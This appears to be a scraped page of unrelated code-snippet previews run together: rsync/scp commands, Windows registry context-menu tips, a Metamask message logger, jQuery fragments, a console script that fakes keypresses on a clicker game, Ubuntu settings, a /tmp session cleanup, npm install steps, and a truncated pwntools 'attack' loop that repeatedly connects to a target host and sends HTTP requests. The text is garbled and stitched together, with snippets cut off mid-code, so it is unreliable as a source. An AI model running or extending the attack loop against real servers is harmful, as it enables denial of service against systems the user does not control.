rsync --compress --archive --partial --append-verify --verbose --progress -e "ssh -i ~/SSH_KEY" LOCAL_FILE.zip REMOTE_USER@REMOTE_IP:REMOTE_FILE.zip
scp -i ~/SSH_KEY LOCAL_FILE REMOTE_USER@REMOTE_IP:REMOTE_FILE.zip
To remove unused items, you must remove items from the registry. You'll find some items in these folders, but you can also search for specific items you see in the context menu.
HKEY_CLASSES_ROOT\Folder\shell\ (Do NOT remove opennewwindow - it is required for file explorer to work on your windows tray.)
HKEY_CLASSES_ROOT\exefile\shellex\ContextMenuHandlers\
| onmessage = event => { | |
| console.error('Metamask:', event.data.data.data) | |
| } |
| <script> | |
| jQuery(document).ready(function($) { | |
| function checkFunction(color) { | |
| console.log(color); | |
| var x = $("li." + color); | |
| var exists = false; | |
| for (var i = 0; i < x.length; i++) { | |
| if($(x[i]).hasClass("active")) { |
| /* | |
| 1) Open https://popcat.click | |
| 2) Open console (F12) | |
| 3) Insert code & run | |
| */ | |
| var event = new KeyboardEvent('keydown', { | |
| key: 'g', | |
| ctrlKey: true |
Magic crafts to make Ubuntu much awesomeness.
Install better OSD https://extensions.gnome.org/extension/1345/better-osd/
Size: 7
Hide delay: 1500
// Right bottom:
| find /tmp -name 'sess_*' -mtime +5 -exec rm {} \; |
| from pwn import * | |
| def attack(wait): | |
| print("Waiting for "+str(wait)+" secs..") | |
| sleep(wait) | |
| while True: | |
| r = remote(sys.argv[1], sys.argv[2]) | |
| cnt = 0 | |
| try: | |
| r.sendline("GET / HTTP/1.1\r") |
download source from the latest release.
npm install phantomjs-prebuilt --ignore-scripts
npm install
npm audit fix
rm -rf node_modules/electron & npm install electron